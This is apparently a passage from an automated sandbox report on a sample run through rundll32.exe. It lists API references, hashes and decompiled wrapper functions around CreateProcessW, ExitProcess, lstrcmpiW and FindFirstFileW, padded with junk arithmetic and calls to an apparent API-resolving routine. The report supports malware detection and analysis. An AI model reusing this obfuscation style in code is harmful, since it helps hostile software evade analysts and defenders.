Opcode ID: dc22762909415d96dbafbb1ec11f2763af08e6e2f6ae9ff123fa761a2e6874b7
Instruction ID: 6c4a4b3040cde1e9e14ca5aada63f7463b9f54af28756fe6500d3e6758182aa8
Opcode Fuzzy Hash: dc22762909415d96dbafbb1ec11f2763af08e6e2f6ae9ff123fa761a2e6874b7
Instruction Fuzzy Hash: 04D05EB2A04A2DAB9E252BE59C0CCCB7A2CFF167653004421F700C2100EB75E900CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 6E9D7468, Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 6E9D74CC: _free.LIBCMT ref: 6E9D74EC

_free.LIBCMT ref: 6E9D7482

Part of subcall function 6E9D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BAE
Part of subcall function 6E9D9B98: GetLastError.KERNEL32(6E9D6995,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BC0

_free.LIBCMT ref: 6E9D7495
_free.LIBCMT ref: 6E9D74A6
_free.LIBCMT ref: 6E9D74B7

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: de9c0e1c4e4b73d29af6d53943d6a98cbe62b16d16ab2b2aa32d0930f600fee0
Instruction ID: 69a809993fa0d4df249b68d783abea051e1008cc241021b114026347a5e13d50
Opcode Fuzzy Hash: de9c0e1c4e4b73d29af6d53943d6a98cbe62b16d16ab2b2aa32d0930f600fee0
Instruction Fuzzy Hash: ACF01270C10F607B9B017F5899408F53B5DEE7A51E342C51EE4086A210D7B5455F8A81

Uniqueness

Uniqueness Score: -1.00%

Function 6E9BBC70, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 204COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,7BDA3107,00000000,?), ref: 6E9BBCDE

Strings

\PerfmonBar\config.xml, xrefs: 6E9BBD92

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderPath
String ID: \PerfmonBar\config.xml
API String ID: 1514166925-3729978544
Opcode ID: d78ee49eb1703d876762e0854d9fece5a403e53f5bf54bebea3b1d6db5a0f97b
Instruction ID: 80412c9f27ff1f6c735af0c051a5c637ffa7566167cd889968b6738788f0d149
Opcode Fuzzy Hash: d78ee49eb1703d876762e0854d9fece5a403e53f5bf54bebea3b1d6db5a0f97b
Instruction Fuzzy Hash: 0971B071D106189FDB20DFA4CC84B9EB7B4FF48714F104699E919AB280EB70EA44CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E560B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6E9E5866,?,00000050,?,?,?,?,?), ref: 6E9E56E6

Strings

OCP, xrefs: 6E9E565F
ACP, xrefs: 6E9E5629

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 2ea94e97b4c61eea02b848624afade4b576849972757c9757263db1552c1e10e
Instruction ID: 4a3d870b0918f8c2050b0ce297549fed5c48e156d0da0b5afaeae83d15173131
Opcode Fuzzy Hash: 2ea94e97b4c61eea02b848624afade4b576849972757c9757263db1552c1e10e
Instruction Fuzzy Hash: 16213A62A55501AAE7568BD5CD04BCB73AEAF44F24F528824EB05D7A08FB32DE00CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C7FF4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,6E9C7876,00000001,00000004,6E9B224A,00000000,?,6E9B1D57,6EA014C0,6E9B5700,6EA014C4,?,6E9B224A,00000004,00000001), ref: 6E9C8078

Strings

ios_base::failbit set, xrefs: 6E9C7FF7

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID: ios_base::failbit set
API String ID: 1452528299-3924258884
Opcode ID: d7f4f1d4c23142e36f91f8574d9ef50de092391b2c3a9cc891a5ce686561fa9f
Instruction ID: c59e2e6678078a028168d533144ef639bbe4b45feb987a9ad5944e353dee57bb
Opcode Fuzzy Hash: d7f4f1d4c23142e36f91f8574d9ef50de092391b2c3a9cc891a5ce686561fa9f
Instruction Fuzzy Hash: 6E11067324421AAFCF26AF94CC449AEB779BF09B10F014438FA1596210D730E810CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C81F2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 6E9B8BC0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,6E9FD6E8), ref: 6E9B8BC5
Part of subcall function 6E9B8BC0: GetLastError.KERNEL32(?,00000000,00000000,?,6E9FD6E8), ref: 6E9B8BCF

IsDebuggerPresent.KERNEL32(?,?,?,6E9B11DF), ref: 6E9C8225
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6E9B11DF), ref: 6E9C8234

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6E9C822F

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: f1ee4e744fc650d237d39d02a89c7a41bebf84574a3bdd9cf6ae725b61cf1af0
Instruction ID: 8e7dc3383f762437b3a819b8409bafd8b68766569d90facc663fe719b8fb3e34
Opcode Fuzzy Hash: f1ee4e744fc650d237d39d02a89c7a41bebf84574a3bdd9cf6ae725b61cf1af0
Instruction Fuzzy Hash: 64E06DB0104B118BD7759FE4C0187427BF8AF59B58F008C2DD596C6A08EB70E048CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DEAB3, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00E364F8), ref: 6E9DEB49
GetLastError.KERNEL32 ref: 6E9DEB57
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6E9DEBB2

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: e7ecdcec119ec7fc9d56ede30a2822f020d8c8537f04a176c4541d37ebf2acb8
Instruction ID: a9ffc421d158c918071a41c1628150152f63bd0b176d01918b7be8b072017cf5
Opcode Fuzzy Hash: e7ecdcec119ec7fc9d56ede30a2822f020d8c8537f04a176c4541d37ebf2acb8
Instruction Fuzzy Hash: 98413A30E04E26AFDB628FE9C8447AEBBB8EF41314F118569E85597194D730E948CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C8508, Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000008,00000000,6E9C3342), ref: 6E9C850D
HeapAlloc.KERNEL32(00000000), ref: 6E9C8514
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E9C855A
HeapFree.KERNEL32(00000000), ref: 6E9C8561

Part of subcall function 6E9C83A7: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6E9C8550,00000000), ref: 6E9C83CB
Part of subcall function 6E9C83A7: HeapAlloc.KERNEL32(00000000), ref: 6E9C83D2

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$Free
String ID:
API String ID: 1864747095-0
Opcode ID: 74426c28118c8c16c844064c9b0f8189ab288359226d61f42ec87b9977065588
Instruction ID: 91884b5bd2f8bc8ee7544877da3e027186b81f70e72440de7c08854de1b86c52
Opcode Fuzzy Hash: 74426c28118c8c16c844064c9b0f8189ab288359226d61f42ec87b9977065588
Instruction Fuzzy Hash: 1CF0B4B2548B525BCB793BF8A80C95F2A79AFC2F61701485CF649C6248EF70D4018B63

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 5940 Parent PID: 2804 rundll32.exeCOMMON

Executed Functions

Function 032531D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E032531D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E03252523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E03232309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

0x032531da
0x032531df
0x032531e1
0x032531e4
0x032531e7
0x032531e8
0x032531e9
0x032531ec
0x032531ef
0x032531f2
0x032531f3
0x032531f4
0x032531f7
0x032531fa
0x032531fd
0x032531fe
0x03253200
0x03253205
0x0325320f
0x03253214
0x0325321b
0x0325321f
0x03253223
0x0325322a
0x03253231
0x03253235
0x03253241
0x03253249
0x0325324c
0x03253253
0x0325325a
0x0325325e
0x03253265
0x0325326c
0x03253273
0x0325327a
0x03253281
0x032532a1
0x032532bb
0x032532c2

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 032532BB

Memory Dump Source

Source File: 00000003.00000002.352348862.0000000003230000.00000040.00000001.sdmp, Offset: 03230000, based on PE: true

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: b4c70e1e596eff239cb94a2b31795851800c4df8990a9d1f0da2b7701ba29e44
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 94311676801248BBCF65DF96CD09CDFBFB5FB89704F108188F91466220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03234248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03234248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E03232309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

0x0323424e
0x03234254
0x0323425b
0x03234262
0x03234269
0x03234272
0x03234277
0x0323427c
0x03234283
0x0323428a
0x03234291
0x03234298
0x032342a2
0x032342aa
0x032342ad
0x032342b1
0x032342b5
0x032342bc
0x032342c3
0x032342c7
0x032342e7
0x032342f1

APIs

ExitProcess.KERNEL32(00000000), ref: 032342F1

Memory Dump Source

Source File: 00000003.00000002.352348862.0000000003230000.00000040.00000001.sdmp, Offset: 03230000, based on PE: true

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: b9750e4970ee4374dbf1ee65c2e7a429a7a8642ed4cdf7b2c20352bfae46bba7
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: 531128B5E00208EBDB44DFE5D94AADEBBF1FB45308F208089E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 032417CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E032417CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E03252523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E03232309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

0x032417d2
0x032417d5
0x032417d7
0x032417db
0x032417dc
0x032417e1
0x032417e8
0x032417f1
0x032417f8
0x032417ff
0x03241803
0x03241807
0x0324180e
0x0324181b
0x03241822
0x03241825
0x0324182c
0x03241833
0x03241844
0x03241847
0x03241859
0x0324185c
0x03241863
0x0324186a
0x0324186e
0x03241881
0x0324188d
0x03241893

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 0324188D

Memory Dump Source

Source File: 00000003.00000002.352348862.0000000003230000.00000040.00000001.sdmp, Offset: 03230000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 8b1cc8aacfad652cbce487766e5128383e6acd7c1f9912d6588e9fb6cda29297
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 342127B5D1020CFFDB08DFA4C94A9EEBBB4EB44304F108189E425B7240E3B56B449F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6420 Parent PID: 6164 rundll32.exeCOMMON

Executed Functions

Function 00B431D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00B431D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E00B42523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E00B22309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

0x00b431da
0x00b431df
0x00b431e1
0x00b431e4
0x00b431e7
0x00b431e8
0x00b431e9
0x00b431ec
0x00b431ef
0x00b431f2
0x00b431f3
0x00b431f4
0x00b431f7
0x00b431fa
0x00b431fd
0x00b431fe
0x00b43200
0x00b43205
0x00b4320f
0x00b43214
0x00b4321b
0x00b4321f
0x00b43223
0x00b4322a
0x00b43231
0x00b43235
0x00b43241
0x00b43249
0x00b4324c
0x00b43253
0x00b4325a
0x00b4325e
0x00b43265
0x00b4326c
0x00b43273
0x00b4327a
0x00b43281
0x00b432a1
0x00b432bb
0x00b432c2

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 00B432BB

Memory Dump Source

Source File: 00000005.00000002.413691967.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: 252ce7b34c58629fb88da32c6275b8ef2803e3591db899b33a4c011b56ea4290
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: A8310372801248BBCF65DF96CD09CDFBFB5FB99704F108188F914A2220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B24248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B24248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E00B22309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

0x00b2424e
0x00b24254
0x00b2425b
0x00b24262
0x00b24269
0x00b24272
0x00b24277
0x00b2427c
0x00b24283
0x00b2428a
0x00b24291
0x00b24298
0x00b242a2
0x00b242aa
0x00b242ad
0x00b242b1
0x00b242b5
0x00b242bc
0x00b242c3
0x00b242c7
0x00b242e7
0x00b242f1

APIs

ExitProcess.KERNEL32(00000000), ref: 00B242F1

Memory Dump Source

Source File: 00000005.00000002.413691967.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: b79b312a0c5573135f64705db7b381619e48f6926717a4e97f3af622dec575a1
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: AF1116B5E00208EBDB48DFE5D94AA9EBBF1FB54308F208089E515A7240D7B45B188FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B317CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00B317CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00B42523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E00B22309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

0x00b317d2
0x00b317d5
0x00b317d7
0x00b317db
0x00b317dc
0x00b317e1
0x00b317e8
0x00b317f1
0x00b317f8
0x00b317ff
0x00b31803
0x00b31807
0x00b3180e
0x00b3181b
0x00b31822
0x00b31825
0x00b3182c
0x00b31833
0x00b31844
0x00b31847
0x00b31859
0x00b3185c
0x00b31863
0x00b3186a
0x00b3186e
0x00b31881
0x00b3188d
0x00b31893

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 00B3188D

Memory Dump Source

Source File: 00000005.00000002.413691967.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 005b895a41377b9c749a0014070357344e2645fb35ad4c57ff3aa120f7c64605
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: CB2124B5D0020CFFDB08DFA4D94A9EEBBB4EB44304F208189E425B7240E3B56B049FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6388 Parent PID: 672 rundll32.exeCOMMON

Executed Functions

Function 00EB1A80, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
fileCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00EB1A80(void* __ecx, struct _WIN32_FIND_DATAW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t44;
				void* _t55;
				signed int _t57;
				struct _WIN32_FIND_DATAW* _t63;

				_push(_a16);
				_t63 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00EC2523(_t44);
				_v36 = 0x40784c;
				asm("stosd");
				asm("stosd");
				_t57 = 0x66;
				asm("stosd");
				_v8 = 0xc58147;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0xffff0e61;
				_v8 = _v8 ^ 0xffff2899;
				_v16 = 0x3eee0f;
				_v16 = _v16 ^ 0xf4098113;
				_v16 = _v16 * 0x76;
				_v16 = _v16 ^ 0x918df00d;
				_v12 = 0x61adbd;
				_v12 = _v12 | 0x1ce5c3f2;
				_v12 = _v12 ^ 0x5ce6c57a;
				_v12 = _v12 ^ 0x400dc737;
				_v20 = 0x919b51;
				_v20 = _v20 + 0x9c69;
				_v20 = _v20 ^ 0x00927a19;
				E00EA2309(0x352, _t57, _t57, 0x810611c3, _t57, 0x9c9047d0);
				_t55 = FindFirstFileW(_a16, _t63); // executed
				return _t55;
			}

0x00eb1a88
0x00eb1a8b
0x00eb1a8d
0x00eb1a90
0x00eb1a93
0x00eb1a96
0x00eb1a98
0x00eb1a9d
0x00eb1aac
0x00eb1ab1
0x00eb1ab2
0x00eb1ab9
0x00eb1aba
0x00eb1acb
0x00eb1ace
0x00eb1ad2
0x00eb1ad9
0x00eb1ae0
0x00eb1ae7
0x00eb1af9
0x00eb1afc
0x00eb1b03
0x00eb1b0a
0x00eb1b11
0x00eb1b18
0x00eb1b1f
0x00eb1b26
0x00eb1b2d
0x00eb1b40
0x00eb1b4c
0x00eb1b53

APIs

FindFirstFileW.KERNEL32(00EACC4B,?,?,?,?,?,?,?,?,?,?,09AB8BF6,00000072), ref: 00EB1B4C

Strings

Lx@, xrefs: 00EB1A9D

Memory Dump Source

Source File: 0000000E.00000002.816833066.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: FileFindFirst
String ID: Lx@
